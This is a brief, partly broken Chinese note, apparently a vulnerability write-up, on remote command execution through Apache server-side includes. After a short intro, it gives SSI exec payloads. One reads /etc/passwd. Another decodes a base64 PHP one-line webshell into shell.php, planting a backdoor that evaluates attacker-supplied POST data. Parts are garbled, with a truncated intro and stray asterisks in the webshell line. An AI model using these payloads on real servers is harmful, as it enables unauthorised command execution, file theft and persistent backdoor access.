Apache SSI 远程命令执行漏洞
Apache SSI 远程命令执行漏洞
ssi简介
SSI(
例如,您可以将指令放置到现有的HTML页面中,例如:
<!--#echo var="DATE_LOCAL" -->
并且,当该页面被投放时,该片段将被评估并替换为其值:
Tuesday, 15-Jan-2013 19:28:54 EST
读取etc/password
<!--#exec cmd="cat /etc/passwd" -->
也可以写入一句话木马
<!--*#exec cmd="echo PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4=|base64 -d> shell.php"-->*